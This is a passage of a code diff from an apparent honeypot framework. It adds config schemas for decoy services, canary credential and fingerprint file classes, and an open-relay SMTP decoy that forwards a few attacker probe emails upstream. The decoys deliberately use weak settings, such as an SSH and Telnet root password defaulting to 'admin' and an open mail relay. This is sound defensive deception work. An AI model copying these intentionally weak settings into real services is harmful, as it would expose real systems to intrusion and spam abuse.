    except Exception as exc:  # noqa: BLE001
        logger.warning("smtp probe listener: bus unavailable: %s", exc)
    finally:
        if bus is not None:
            # Best-effort close: a failing close must not mask the real error.
            with contextlib.suppress(Exception):
                await bus.close()
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
decky_name = (payload.get("decky") or "").strip()
attacker_ip = (payload.get("attacker_ip") or "").strip()
stored_as = (payload.get("stored_as") or "").strip()
mail_from = (payload.get("mail_from") or "").strip()
rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
if not (decky_name and attacker_ip and stored_as):
return
decky_row = await repo.get_fleet_decky_by_name(decky_name)
if not decky_row:
return
svc_cfg = (
(decky_row.get("decky_config") or {})
.get("service_config", {})
.get("smtp_relay") or {}
)
if not (svc_cfg.get("upstream_host") or "").strip():
return
probe_limit = int(svc_cfg.get("probe_limit") or 1)
already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
if already_sent >= probe_limit:
return
rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
loop = asyncio.get_event_loop()
ok, reason = await loop.run_in_executor(
None,
lambda: forward_probe(
svc_cfg=svc_cfg,
stored_as=stored_as,
decky_name=decky_name,
mail_from=mail_from,
rcpt_to=rcpt_to,
artifacts_root=artifacts_root,
),
)
await repo.add_bounty({
"decky": decky_name,
"service": "smtp_relay",
"attacker_ip": attacker_ip,
"bounty_type": "probe_relay",
"payload": {
"stored_as": stored_as,
"forwarded": ok,
**({"fwd_error": reason} if not ok else {}),
},
})
if ok:
logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
else:
logger.warning(
"smtp probe forward failed decky=%s ip=%s error=%s",
decky_name, attacker_ip, reason,
)
async def _record_synthetic_file(repo, action) -> None:
"""Persist (or patch) a synthetic_files row after a FileAction plant.

View File

@@ -25,11 +25,14 @@ from __future__ import annotations
import asyncio
import secrets
from datetime import datetime, timezone
from typing import Callable, Optional
from typing import TYPE_CHECKING, Callable, Optional
from decnet.logging import get_logger
from decnet.realism.taxonomy import ContentClass
if TYPE_CHECKING:
from decnet.realism.personas import EmailPersona
log = get_logger("realism.bodies")
@@ -205,6 +208,9 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
ContentClass.LOG_DAEMON: _body_log_daemon,
ContentClass.CACHE_TMP: _body_cache_tmp,
ContentClass.EMAIL: _body_email,
# All canary classes share one placeholder — content-class discriminant is the
# "what"; the real payload (token slug, DNS hook URL) is injected by the canary
# cultivator. Do not replace with distinct generators without updating cultivator.
ContentClass.CANARY_AWS_CREDS: _body_canary,
ContentClass.CANARY_ENV_FILE: _body_canary,
ContentClass.CANARY_GIT_CONFIG: _body_canary,
@@ -213,6 +219,8 @@ _BODIES: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
ContentClass.CANARY_HONEYDOC_DOCX: _body_canary,
ContentClass.CANARY_HONEYDOC_PDF: _body_canary,
ContentClass.CANARY_MYSQL_DUMP: _body_canary,
ContentClass.CANARY_FINGERPRINT_HTML: _body_canary,
ContentClass.CANARY_FINGERPRINT_SVG: _body_canary,
}
@@ -240,7 +248,7 @@ def make_body(
async def make_body_with_llm(
content_class: ContentClass,
persona, # EmailPersona — typed loosely to avoid an import cycle
persona: "EmailPersona",
*,
llm=None, # LLMBackend | None
breaker=None, # LLMCircuitBreaker | None

View File

@@ -38,7 +38,7 @@ def _parse_window(window: str) -> tuple[int, int, int, int] | None:
Returns ``None`` for malformed input — callers treat that as
"always-on" so a single config typo never silences the whole fleet
(mirrors :func:`decnet.realism.personas.in_active_hours` semantics).
(:func:`decnet.realism.personas.in_active_hours` delegates here).
"""
try:
start_s, end_s = window.split("-")

View File

@@ -38,7 +38,7 @@ class FakeBackend(LLMBackend):
)
self._success = success
async def generate(self, prompt: str) -> LLMResult: # noqa: ARG002
async def generate(self, _prompt: str) -> LLMResult:
t0 = time.monotonic()
latency_ms = int((time.monotonic() - t0) * 1000)
return LLMResult(

View File

@@ -159,6 +159,8 @@ _NAMERS: dict[ContentClass, Callable[[str, secrets.SystemRandom], str]] = {
ContentClass.CANARY_HONEYDOC_DOCX: _name_canary,
ContentClass.CANARY_HONEYDOC_PDF: _name_canary,
ContentClass.CANARY_MYSQL_DUMP: _name_canary,
ContentClass.CANARY_FINGERPRINT_HTML: _name_canary,
ContentClass.CANARY_FINGERPRINT_SVG: _name_canary,
}

View File

@@ -19,11 +19,13 @@ not stall the entire realism tick.
from __future__ import annotations
import json
from datetime import datetime
from typing import Literal, Optional
from pydantic import BaseModel, Field, ValidationError, field_validator, model_validator
from decnet.logging import get_logger
from decnet.realism.diurnal import in_work_hours
logger = get_logger("realism.personas")
@@ -132,22 +134,10 @@ def login_for(persona: str) -> str:
return "user"
def in_active_hours(persona: EmailPersona, now_hour: int) -> bool:
"""Return True if *now_hour* (023) falls in the persona's window.
def in_active_hours(persona: EmailPersona, now: datetime) -> bool:
"""Return True if *now* falls in the persona's active-hours window.
Format: ``"HH:MM-HH:MM"``. Wrap-around windows (``"22:00-06:00"``)
are supported. Invalid windows treat the persona as always-on so a
config typo never silences the whole fleet.
Delegates to :func:`decnet.realism.diurnal.in_work_hours` so minute
precision is preserved (``"09:30-17:45"`` is honoured correctly).
"""
try:
start_s, end_s = persona.active_hours.split("-")
start_h = int(start_s.split(":")[0])
end_h = int(end_s.split(":")[0])
except (ValueError, IndexError):
return True
if start_h == end_h:
return True
if start_h < end_h:
return start_h <= now_hour < end_h
# Wrap-around (e.g. 22:00-06:00).
return now_hour >= start_h or now_hour < end_h
return in_work_hours(persona.active_hours, now)

View File

@@ -120,11 +120,19 @@ def load(*, language_default: str = "en") -> list[EmailPersona]:
logger.warning("realism global pool: read failed path=%s: %s", path, exc)
return []
# Re-stat after the read so the stored mtime reflects what we actually
# parsed — a file change between the initial stat and read would otherwise
# cache a stale mtime and suppress the next reload.
try:
st2 = path.stat()
except OSError:
st2 = st
parsed = parse_personas(raw, language_default=language_default)
with _lock:
_cache = parsed
_cache_path = path
_cache_mtime = st.st_mtime
_cache_mtime = st2.st_mtime
if parsed:
logger.info(
"realism global pool: loaded %d personas from %s", len(parsed), path,

View File

@@ -20,6 +20,7 @@ persona outside its window is never considered.
from __future__ import annotations
import secrets
import threading
from datetime import datetime
from typing import Any, Optional, Sequence
@@ -62,6 +63,8 @@ _DEFAULT_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = (
(ContentClass.CANARY_HONEYDOC_DOCX, 1),
(ContentClass.CANARY_HONEYDOC_PDF, 1),
(ContentClass.CANARY_MYSQL_DUMP, 1),
(ContentClass.CANARY_FINGERPRINT_HTML, 1),
(ContentClass.CANARY_FINGERPRINT_SVG, 1),
)
_DEFAULT_CANARY_PROBABILITY = 0.03
@@ -72,6 +75,7 @@ _USER_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_USER_CLASS_
_SYSTEM_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_SYSTEM_CLASS_WEIGHTS
_CANARY_CLASS_WEIGHTS: tuple[tuple[ContentClass, int], ...] = _DEFAULT_CANARY_CLASS_WEIGHTS
_CANARY_PROBABILITY: float = _DEFAULT_CANARY_PROBABILITY
_planner_lock = threading.Lock()
def _serialize_weights(
@@ -82,12 +86,15 @@ def _serialize_weights(
def _parse_weights(
raw: Any, allowed: set[ContentClass],
) -> tuple[tuple[ContentClass, int], ...]:
) -> tuple[tuple[tuple[ContentClass, int], ...], list[str]]:
"""Parse ``[{"content_class": "...", "weight": N}, ...]`` into the
planner's internal tuple shape. Drops entries whose ``content_class``
isn't in *allowed* (defends against an operator pasting in a canary
class on the user list, which would skew sampling without the
canary-probability gate).
planner's internal tuple shape.
Returns ``(weights, dropped)`` where *dropped* is the list of
``content_class`` values that were valid enum members but not in
*allowed* (e.g. a canary class pasted onto the user list). Callers
surface *dropped* in the API response so the operator can see the
entry didn't land without having to re-read the config.
Raises ``ValueError`` on structural problems (non-list, non-int
weight, negative weight, empty result) so the API can return 400.
@@ -95,6 +102,7 @@ def _parse_weights(
if not isinstance(raw, list):
raise ValueError("weights must be a list")
out: list[tuple[ContentClass, int]] = []
dropped: list[str] = []
for entry in raw:
if not isinstance(entry, dict):
raise ValueError("each weight entry must be an object")
@@ -111,18 +119,14 @@ def _parse_weights(
except (ValueError, TypeError):
raise ValueError(f"unknown content_class: {cls_name!r}")
if cls not in allowed:
# Silently drop — a class that doesn't belong on this list
# (e.g. a canary class on the user list) is operator error,
# but we don't want to fail the whole save over one stray
# entry. The roundtrip in current_payload() will show the
# operator their entry didn't land.
dropped.append(cls.value)
continue
out.append((cls, weight))
if not out:
raise ValueError("weights list resolved to zero valid entries")
if sum(w for _, w in out) <= 0:
raise ValueError("weights must sum to a positive number")
return tuple(out)
return tuple(out), dropped
_USER_CLASSES: set[ContentClass] = {
@@ -136,6 +140,7 @@ _CANARY_CLASSES: set[ContentClass] = {
ContentClass.CANARY_GIT_CONFIG, ContentClass.CANARY_SSH_KEY,
ContentClass.CANARY_HONEYDOC, ContentClass.CANARY_HONEYDOC_DOCX,
ContentClass.CANARY_HONEYDOC_PDF, ContentClass.CANARY_MYSQL_DUMP,
ContentClass.CANARY_FINGERPRINT_HTML, ContentClass.CANARY_FINGERPRINT_SVG,
}
@@ -151,15 +156,21 @@ def current_payload() -> dict[str, Any]:
}
def apply_payload(payload: dict[str, Any]) -> None:
def apply_payload(payload: dict[str, Any]) -> list[str]:
"""Override the planner's live globals from a wire payload.
Validates structurally and rebinds module-level names atomically
per field — partial failures don't leave the planner in a torn
state because validation happens before any rebind.
Returns the list of ``content_class`` values that were dropped
because they didn't belong on their target list (e.g. a canary
class on the user list). Callers should surface this in the API
response so operators know their entry didn't land.
Unknown fields are ignored (forward-compat); fields not present
leave the corresponding global untouched."""
leave the corresponding global untouched.
"""
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
@@ -167,37 +178,45 @@ def apply_payload(payload: dict[str, Any]) -> None:
new_system = _SYSTEM_CLASS_WEIGHTS
new_canary = _CANARY_CLASS_WEIGHTS
new_prob = _CANARY_PROBABILITY
all_dropped: list[str] = []
if "user_class_weights" in payload:
new_user = _parse_weights(payload["user_class_weights"], _USER_CLASSES)
new_user, dropped = _parse_weights(payload["user_class_weights"], _USER_CLASSES)
all_dropped.extend(dropped)
if "system_class_weights" in payload:
new_system = _parse_weights(
new_system, dropped = _parse_weights(
payload["system_class_weights"], _SYSTEM_CLASSES,
)
all_dropped.extend(dropped)
if "canary_class_weights" in payload:
new_canary = _parse_weights(
new_canary, dropped = _parse_weights(
payload["canary_class_weights"], _CANARY_CLASSES,
)
all_dropped.extend(dropped)
if "canary_probability" in payload:
prob = payload["canary_probability"]
if not isinstance(prob, (int, float)) or not (0.0 <= prob <= 1.0):
raise ValueError("canary_probability must be in [0.0, 1.0]")
new_prob = float(prob)
_USER_CLASS_WEIGHTS = new_user
_SYSTEM_CLASS_WEIGHTS = new_system
_CANARY_CLASS_WEIGHTS = new_canary
_CANARY_PROBABILITY = new_prob
with _planner_lock:
_USER_CLASS_WEIGHTS = new_user
_SYSTEM_CLASS_WEIGHTS = new_system
_CANARY_CLASS_WEIGHTS = new_canary
_CANARY_PROBABILITY = new_prob
return all_dropped
def reset_to_defaults() -> None:
"""Restore hardcoded defaults. Used by tests and the API reset path."""
global _USER_CLASS_WEIGHTS, _SYSTEM_CLASS_WEIGHTS
global _CANARY_CLASS_WEIGHTS, _CANARY_PROBABILITY
_USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS
_SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS
_CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS
_CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY
with _planner_lock:
_USER_CLASS_WEIGHTS = _DEFAULT_USER_CLASS_WEIGHTS
_SYSTEM_CLASS_WEIGHTS = _DEFAULT_SYSTEM_CLASS_WEIGHTS
_CANARY_CLASS_WEIGHTS = _DEFAULT_CANARY_CLASS_WEIGHTS
_CANARY_PROBABILITY = _DEFAULT_CANARY_PROBABILITY
def _weighted_pick(

View File

@@ -62,6 +62,8 @@ class ContentClass(StrEnum):
CANARY_HONEYDOC_DOCX = "canary_honeydoc_docx"
CANARY_HONEYDOC_PDF = "canary_honeydoc_pdf"
CANARY_MYSQL_DUMP = "canary_mysql_dump"
CANARY_FINGERPRINT_HTML = "canary_fingerprint_html"
CANARY_FINGERPRINT_SVG = "canary_fingerprint_svg"
def is_canary(self) -> bool:
    """Report whether this member's string value carries the ``canary_`` prefix."""
    marker = "canary_"
    return self.value[: len(marker)] == marker

View File

@@ -1,5 +1,47 @@
import base64
import binascii
from abc import ABC, abstractmethod
from dataclasses import asdict, dataclass
from pathlib import Path
from typing import Any, Literal
# Sentinel prefix used by the deploy wizard to ship multi-line textarea values
# through ConfigParser without relying on its multi-line continuation syntax.
# Plain raw values without the prefix are accepted as-is so direct API
# submitters (PUT /…/services/{svc}/config) keep working with raw strings.
TEXTAREA_B64_PREFIX = "b64:"
FieldType = Literal["string", "password", "int", "bool", "textarea", "enum"]
@dataclass(frozen=True)
class ServiceConfigField:
"""
Declarative descriptor for one user-editable knob on a service.
The Inspector form (Fleet + MazeNET) renders inputs from this metadata,
and BaseService.validate_cfg coerces submitted values against it.
"""
key: str
label: str
type: FieldType = "string"
default: Any = None
secret: bool = False
help: str | None = None
enum: list[str] | None = None
placeholder: str | None = None
def to_json(self) -> dict:
d = asdict(self)
# Frontend doesn't need a None enum dangling on non-enum fields
if self.enum is None:
d.pop("enum", None)
return d
class ConfigValidationError(ValueError):
    """Raised when a submitted service_cfg value cannot be coerced to its declared type.

    Derives from ``ValueError``, so handlers that catch ``ValueError`` also
    catch this exception.
    """
class BaseService(ABC):
@@ -15,6 +57,10 @@ class BaseService(ABC):
default_image: str # Docker image tag, or "build" if a Dockerfile is needed
fleet_singleton: bool = False # True = runs once fleet-wide, not per-decky
# Per-service customizable fields exposed to the Inspector UI.
# Subclasses override; default empty -> "No customizable fields".
config_schema: list[ServiceConfigField] = []
@abstractmethod
def compose_fragment(
self,
@@ -41,3 +87,63 @@ class BaseService(ABC):
image built. Return None if default_image is used directly.
"""
return None
def validate_cfg(self, cfg: dict | None) -> dict:
"""
Coerce a user-submitted dict against this service's config_schema.
Unknown keys are silently dropped. Declared keys are coerced to their
declared type (raising ConfigValidationError on bad values). Empty
strings on optional fields drop the key entirely so compose_fragment's
existing `if "X" in cfg` guards keep working.
"""
out: dict[str, Any] = {}
if not cfg:
return out
by_key = {f.key: f for f in self.config_schema}
for key, raw in cfg.items():
spec = by_key.get(key)
if spec is None:
continue # drop unknown keys
if raw is None or raw == "":
continue
out[key] = _coerce(spec, raw)
return out
def _coerce(spec: ServiceConfigField, raw: Any) -> Any:
t = spec.type
if t in ("string", "password"):
return str(raw)
if t == "textarea":
s = str(raw)
if s.startswith(TEXTAREA_B64_PREFIX):
try:
return base64.b64decode(s[len(TEXTAREA_B64_PREFIX):], validate=True).decode("utf-8")
except (binascii.Error, UnicodeDecodeError) as e:
raise ConfigValidationError(
f"{spec.key}: malformed {TEXTAREA_B64_PREFIX} payload"
) from e
return s
if t == "int":
try:
return int(raw)
except (TypeError, ValueError) as e:
raise ConfigValidationError(f"{spec.key}: expected int, got {raw!r}") from e
if t == "bool":
if isinstance(raw, bool):
return raw
if isinstance(raw, str):
if raw.lower() in ("true", "1", "yes", "on"):
return True
if raw.lower() in ("false", "0", "no", "off"):
return False
raise ConfigValidationError(f"{spec.key}: expected bool, got {raw!r}")
if t == "enum":
s = str(raw)
if spec.enum and s not in spec.enum:
raise ConfigValidationError(
f"{spec.key}: {s!r} not in allowed values {spec.enum}"
)
return s
raise ConfigValidationError(f"{spec.key}: unknown field type {t!r}")

View File

@@ -12,6 +12,7 @@ class ConpotService(BaseService):
name = "conpot"
ports = [502, 161, 80]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
env = {

View File

@@ -8,6 +8,7 @@ class DockerAPIService(BaseService):
name = "docker_api"
ports = [2375, 2376]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -9,6 +9,7 @@ class ElasticsearchService(BaseService):
name = "elasticsearch"
ports = [9200]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class FTPService(BaseService):
name = "ftp"
ports = [21]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,6 +1,6 @@
import json
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "http"
@@ -10,6 +10,41 @@ class HTTPService(BaseService):
ports = [80, 443]
default_image = "build"
config_schema = [
ServiceConfigField(
key="server_header",
label="Server header",
type="string",
placeholder="Apache/2.4.41 (Ubuntu)",
help="Value sent in the HTTP Server: response header.",
),
ServiceConfigField(
key="response_code",
label="Default response code",
type="int",
default=200,
),
ServiceConfigField(
key="fake_app",
label="Fake application",
type="enum",
enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"],
default="none",
help="Pre-baked application skin to render on the index page.",
),
ServiceConfigField(
key="extra_headers",
label="Extra headers (JSON or raw)",
type="textarea",
placeholder='{"X-Powered-By": "PHP/7.4.3"}',
),
ServiceConfigField(
key="custom_body",
label="Custom response body",
type="textarea",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -1,6 +1,6 @@
import json
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "https"
@@ -10,6 +10,57 @@ class HTTPSService(BaseService):
ports = [443]
default_image = "build"
config_schema = [
ServiceConfigField(
key="server_header",
label="Server header",
type="string",
placeholder="nginx/1.18.0",
),
ServiceConfigField(
key="response_code",
label="Default response code",
type="int",
default=200,
),
ServiceConfigField(
key="fake_app",
label="Fake application",
type="enum",
enum=["none", "wordpress", "phpmyadmin", "tomcat", "jenkins"],
default="none",
),
ServiceConfigField(
key="extra_headers",
label="Extra headers (JSON or raw)",
type="textarea",
),
ServiceConfigField(
key="custom_body",
label="Custom response body",
type="textarea",
),
ServiceConfigField(
key="tls_cn",
label="TLS certificate CN",
type="string",
placeholder="mail.corp.local",
help="Common Name baked into the self-signed cert if no cert/key provided.",
),
ServiceConfigField(
key="tls_cert",
label="TLS certificate (PEM)",
type="textarea",
secret=True,
),
ServiceConfigField(
key="tls_key",
label="TLS private key (PEM)",
type="textarea",
secret=True,
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -8,6 +8,7 @@ class IMAPService(BaseService):
name = "imap"
ports = [143, 993]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class KubernetesAPIService(BaseService):
name = "k8s"
ports = [6443, 8080]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class LDAPService(BaseService):
name = "ldap"
ports = [389, 636]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -15,6 +15,7 @@ class LLMNRService(BaseService):
name = "llmnr"
ports = [5355, 5353]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class MongoDBService(BaseService):
name = "mongodb"
ports = [27017]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class MQTTService(BaseService):
name = "mqtt"
ports = [1883]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class MSSQLService(BaseService):
name = "mssql"
ports = [1433]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,5 +1,5 @@
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "mysql"
@@ -9,6 +9,16 @@ class MySQLService(BaseService):
ports = [3306]
default_image = "build"
config_schema = [
ServiceConfigField(
key="version",
label="Advertised MySQL version",
type="string",
placeholder="8.0.36",
help="Sets the version banner the fake MySQL handshake reports.",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -8,6 +8,7 @@ class POP3Service(BaseService):
name = "pop3"
ports = [110, 995]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class PostgresService(BaseService):
name = "postgres"
ports = [5432]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,5 +1,5 @@
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "rdp"
@@ -9,6 +9,19 @@ class RDPService(BaseService):
ports = [3389]
default_image = "build"
config_schema = [
ServiceConfigField(
key="nla",
label="Enable CredSSP / NLA",
type="bool",
default=False,
help=(
"Off by default — basic X.224 cookie capture is enough for most "
"attacker traffic and avoids the openssl cert-gen at container start."
),
),
]
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {
"build": {"context": str(TEMPLATES_DIR)},

View File

@@ -1,5 +1,5 @@
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "redis"
@@ -9,6 +9,23 @@ class RedisService(BaseService):
ports = [6379]
default_image = "build"
config_schema = [
ServiceConfigField(
key="version",
label="Advertised Redis version",
type="string",
placeholder="7.2.4",
help="Reported by INFO server -> redis_version.",
),
ServiceConfigField(
key="os_string",
label="Advertised OS string",
type="string",
placeholder="Linux 5.15.0 x86_64",
help="Reported by INFO server -> os.",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -28,7 +28,7 @@ def _load_plugins() -> None:
for cls in BaseService.__subclasses__():
if not cls.__module__.startswith("decnet.services."):
continue
instance = cls()
instance = cls() # type: ignore[abstract]
_registry[instance.name] = instance
_loaded = True

View File

@@ -8,6 +8,7 @@ class SIPService(BaseService):
name = "sip"
ports = [5060]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -8,6 +8,7 @@ class SMBService(BaseService):
name = "smb"
ports = [445, 139]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,7 +1,7 @@
import os
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "smtp"
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
@@ -16,6 +16,24 @@ class SMTPService(BaseService):
ports = [25, 587]
default_image = "build"
config_schema = [
ServiceConfigField(
key="banner",
label="SMTP greeting banner",
type="string",
placeholder="mail.corp.local ESMTP Postfix",
help="First line returned on TCP connect (220 ...).",
),
ServiceConfigField(
key="mta",
label="MTA persona",
type="enum",
enum=["postfix", "exim", "sendmail"],
default="postfix",
help="Shapes EHLO capability list and error wording.",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -1,7 +1,7 @@
import os
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
# Reuses the same template as the smtp service — only difference is
# SMTP_OPEN_RELAY=1 in the environment, which enables the open relay persona.
@@ -18,6 +18,64 @@ class SMTPRelayService(BaseService):
ports = [25, 587]
default_image = "build"
# User-tunable fields for the open-relay SMTP persona, rendered by the
# Inspector form and enforced by BaseService.validate_cfg.
config_schema = [
    ServiceConfigField(
        key="banner",
        label="SMTP greeting banner",
        type="string",
        placeholder="mail.corp.local ESMTP Postfix",
        help="First line returned on TCP connect (220 ...).",
    ),
    ServiceConfigField(
        key="mta",
        label="MTA persona",
        type="enum",
        enum=["postfix", "exim", "sendmail"],
        default="postfix",
        help="Shapes EHLO capability list and error wording.",
    ),
    ServiceConfigField(
        key="upstream_host",
        label="Upstream relay host",
        type="string",
        placeholder="smtp.sendgrid.net",
        help="Real SMTP relay used to forward probe emails. Leave blank to disable forwarding.",
    ),
    ServiceConfigField(
        key="upstream_port",
        label="Upstream relay port",
        type="int",
        default=25,
        help="Port on the upstream relay (25 or 587).",
    ),
    ServiceConfigField(
        key="upstream_user",
        label="Upstream relay username",
        type="string",
        help="AUTH username for the upstream relay (optional).",
    ),
    # Credential for a real relay: declared as a secret password field,
    # matching how the SSH and Telnet services declare their password
    # fields. Both "string" and "password" coerce via str(), so stored
    # values are unaffected.
    ServiceConfigField(
        key="upstream_pass",
        label="Upstream relay password",
        type="password",
        secret=True,
        help="AUTH password for the upstream relay (optional).",
    ),
    ServiceConfigField(
        key="upstream_sender",
        label="Upstream envelope sender",
        type="string",
        placeholder="probe@yourdomain.com",
        help="Envelope MAIL FROM used when talking to the upstream relay. Set this to an address your server is authorised to send from so SPF passes at the recipient. The attacker's From: header inside the message is untouched.",
    ),
    ServiceConfigField(
        key="probe_limit",
        label="Probe forward limit",
        type="int",
        default=1,
        help="Number of emails per source IP to actually deliver upstream. All subsequent emails are silently quarantined.",
    ),
]
def compose_fragment(
self,
decky_name: str,
@@ -33,6 +91,7 @@ class SMTPRelayService(BaseService):
"cap_add": ["NET_BIND_SERVICE"],
"environment": {
"NODE_NAME": decky_name,
"SMTP_SERVICE_NAME": "smtp_relay",
"SMTP_OPEN_RELAY": "1",
"SMTP_QUARANTINE_DIR": _IN_CONTAINER_QUARANTINE,
},

View File

@@ -16,6 +16,7 @@ class SnifferService(BaseService):
name = "sniffer"
ports: list[int] = []
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
fleet_singleton = True
def compose_fragment(

View File

@@ -8,6 +8,7 @@ class SNMPService(BaseService):
name = "snmp"
ports = [161]
default_image = "build"
# config_schema: no user-tunable fields yet — TODO add when compose_fragment grows cfg reads
def compose_fragment(self, decky_name: str, log_target: str | None = None, service_cfg: dict | None = None) -> dict:
fragment: dict = {

View File

@@ -1,7 +1,7 @@
import os
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "ssh"
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
@@ -25,6 +25,27 @@ class SSHService(BaseService):
ports = [22]
default_image = "build"
config_schema = [
ServiceConfigField(
key="password",
label="Root password",
type="password",
default="admin",
secret=True,
help="Plaintext root password for the in-container sshd.",
),
ServiceConfigField(
key="hostname",
label="Container hostname",
type="string",
help=(
"Cosmetic override for the SSH banner/PS1 — keeps the decoy "
"looking heterogeneous. Decky identity (NODE_NAME) is unaffected."
),
placeholder="e.g. mail-01.corp.local",
),
]
def compose_fragment(
self,
decky_name: str,

View File

@@ -1,7 +1,7 @@
import os
from pathlib import Path
from decnet.services.base import BaseService
from decnet.services.base import BaseService, ServiceConfigField
TEMPLATES_DIR = Path(__file__).parent.parent / "templates" / "telnet"
ARTIFACTS_ROOT = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
@@ -24,6 +24,27 @@ class TelnetService(BaseService):
ports = [23]
default_image = "build"
config_schema = [
ServiceConfigField(
key="password",
label="Root password",
type="password",
default="admin",
secret=True,
help="Plaintext root password for the in-container telnetd.",
),
ServiceConfigField(
key="hostname",
